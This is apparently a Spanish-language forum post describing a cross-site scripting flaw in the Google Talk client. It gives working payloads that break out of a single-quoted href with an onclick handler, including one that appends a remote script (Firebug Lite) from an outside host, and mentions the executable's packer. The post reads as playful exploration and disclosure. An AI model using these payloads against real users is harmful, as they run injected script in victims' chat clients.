Por ejemplo cuando uno escribe un enlace http://<h1>test se ejecuta inmediatamente ya que el enío del string dentro de un href no se filtra y eso significa que un xss puede alojarse en el nombre de la url y el otro en la url misma como código html.
Cuando escribimos http://<h1>test en realidad se imprime esto: <a href='http://<h1>test'>http://<h1>test</a> y como se utilizan comillas simples para los tags de html podemos escapar con http://'onclick='alert(/lol/)'x=' y quedará masomenos así:
<a href='http://'onclick='alert(/lol/)'x=''>http://'onclick='alert(/lol/)'x='</a>
xDD y el resultado es algo asi como esto:

Conversando con SirDarckCat estubimos casi toda la noche jugando con el google talk cambiandole el fondo por una imagen de doom3, paisajes, coloreando los bordes, letras hasta que a el se le ocurrió inyectar el firebug y saber un poco mas del código fuente ya que en realidad no habia archivo temporal porque utilizaba un iframe de internet explorer 6 con la dirección about:blank haciendo document.write

A los que quiean inyectar el firebug pueden escribir estas dos lineas:
Citar
http://'onclick='document.body.appendChild(document.createElement("script")).src="http://getfirebug.com/releases/lite/1.2/firebug-lite-compressed.js"'x='
hacerle click y luegoCitar
http://'onclick='alert(firebug.init())'x='
y al hacerle click llamarán a firebug 
Está entetenido.
Para los que quieran descompilar el ejecutable del gtalk está cifrado en molebox 2.5.7 .